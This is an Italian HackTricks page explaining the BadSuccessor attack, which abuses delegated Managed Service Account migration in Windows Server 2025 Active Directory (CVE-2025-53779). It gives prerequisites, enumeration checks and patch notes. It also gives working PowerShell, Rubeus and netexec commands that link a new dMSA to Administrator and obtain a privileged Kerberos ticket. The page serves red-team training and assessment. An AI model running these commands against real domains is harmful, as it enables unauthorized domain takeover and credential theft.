BadSuccessor
Tip
Impara e pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Sfoglia il catalogo completo di HackTricks Training per i percorsi di assessment (ARTA/GRTA/AzRTA) e Linux Hacking Expert (LHE).
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord, al gruppo telegram, segui @hacktricks_live su X/Twitter, oppure controlla la pagina LinkedIn e il canale YouTube.
- Condividi hacking tricks inviando PR ai repository github HackTricks e HackTricks Cloud.
Panoramica
BadSuccessor abusa del workflow di migrazione del delegated Managed Service Account (dMSA) introdotto in Windows Server 2025. Un dMSA può essere collegato a un account legacy tramite msDS-ManagedAccountPrecededByLink e spostato attraverso gli stati di migrazione memorizzati in msDS-DelegatedMSAState. Se un attacker può creare un dMSA in una OU scrivibile e controllare quegli attributi, il KDC può emettere ticket per il dMSA controllato dall’attacker con il context di authorization dell’account collegato.
In pratica questo significa che un utente a basso privilegio che ha solo diritti delegati sulla OU può creare un nuovo dMSA, puntarlo su Administrator, completare lo stato di migrazione e poi ottenere un TGT il cui PAC contiene gruppi privilegiati come Domain Admins.
Dettagli di migrazione dMSA che contano
- dMSA è una feature di Windows Server 2025.
Start-ADServiceAccountMigrationimposta la migrazione nello stato started.Complete-ADServiceAccountMigrationimposta la migrazione nello stato completed.msDS-DelegatedMSAState = 1significa migrazione avviata.msDS-DelegatedMSAState = 2significa migrazione completata.- Durante la migrazione legittima, il dMSA è pensato per sostituire in modo trasparente l’account superato, quindi il KDC/LSA preservano l’accesso che il precedente account aveva già.
Microsoft Learn nota anche che durante la migrazione l’account originale è legato al dMSA e il dMSA è destinato ad accedere a ciò a cui il vecchio account poteva accedere. Questa è la security assumption che BadSuccessor abusa.
Requisiti
- Un dominio in cui esiste dMSA, il che significa che il supporto Windows Server 2025 è presente sul lato AD.
- L’attacker può creare oggetti
msDS-DelegatedManagedServiceAccountin qualche OU, oppure ha diritti equivalenti e ampi di creazione di child-object lì. - L’attacker può scrivere gli attributi dMSA rilevanti o controllare completamente il dMSA che ha appena creato.
- L’attacker può richiedere Kerberos ticket da un contesto joined al domain o da un tunnel che raggiunge LDAP/Kerberos.
Controlli pratici
Il segnale operativo più pulito è verificare il livello di domain/forest e confermare che l’ambiente stia già usando il nuovo stack Server 2025:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
Se vedi valori come Windows2025Domain e Windows2025Forest, tratta BadSuccessor / dMSA migration abuse come un controllo prioritario.
Puoi anche enumerare OU scrivibili delegate per la creazione di dMSA con public tooling:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Flusso di abuso
- Crea una dMSA in una OU in cui hai diritti delegati di create-child.
- Imposta
msDS-ManagedAccountPrecededByLinksul DN di un target privilegiato comeCN=Administrator,CN=Users,DC=corp,DC=local. - Imposta
msDS-DelegatedMSAStatesu2per segnare la migrazione come completata. - Richiedi un TGT per la nuova dMSA e usa il ticket restituito per accedere ai servizi privilegiati.
Esempio PowerShell:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Richiesta di ticket / esempi di strumenti operativi:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Perché questo è più di un privilege escalation
Durante una migrazione legittima, Windows deve anche far gestire al nuovo dMSA i ticket emessi per l’account precedente prima del cutover. Questo è il motivo per cui il materiale ticket-related di dMSA può includere chiavi current e previous nel flusso KERB-DMSA-KEY-PACKAGE.
Per un fake migration controllato da un attacker, quel comportamento può trasformare BadSuccessor in:
- Privilege escalation ereditando i SID dei gruppi privilegiati nel PAC.
- Credential material exposure perché la gestione della previous-key può esporre materiale equivalente all’RC4/NT hash del predecessore in workflow vulnerabili.
Questo rende la tecnica utile sia per un domain takeover diretto sia per operazioni successive come pass-the-hash o una compromissione più ampia delle credenziali.
Note sullo stato della patch
Il comportamento originale di BadSuccessor non è solo un problema teorico di preview 2025. Microsoft ha assegnato CVE-2025-53779 e ha pubblicato un aggiornamento di sicurezza nell’agosto 2025. Tieni documentato questo attacco per:
- labs / CTFs / assume-breach exercises
- ambienti Windows Server 2025 non patchati
- validazione delle deleghe OU e dell’esposizione dMSA durante gli assessment
Non assumere che un dominio Windows Server 2025 sia vulnerabile solo perché esiste dMSA; verifica il livello di patch e testa con attenzione.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Impara e pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Sfoglia il catalogo completo di HackTricks Training per i percorsi di assessment (ARTA/GRTA/AzRTA) e Linux Hacking Expert (LHE).
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord, al gruppo telegram, segui @hacktricks_live su X/Twitter, oppure controlla la pagina LinkedIn e il canale YouTube.
- Condividi hacking tricks inviando PR ai repository github HackTricks e HackTricks Cloud.


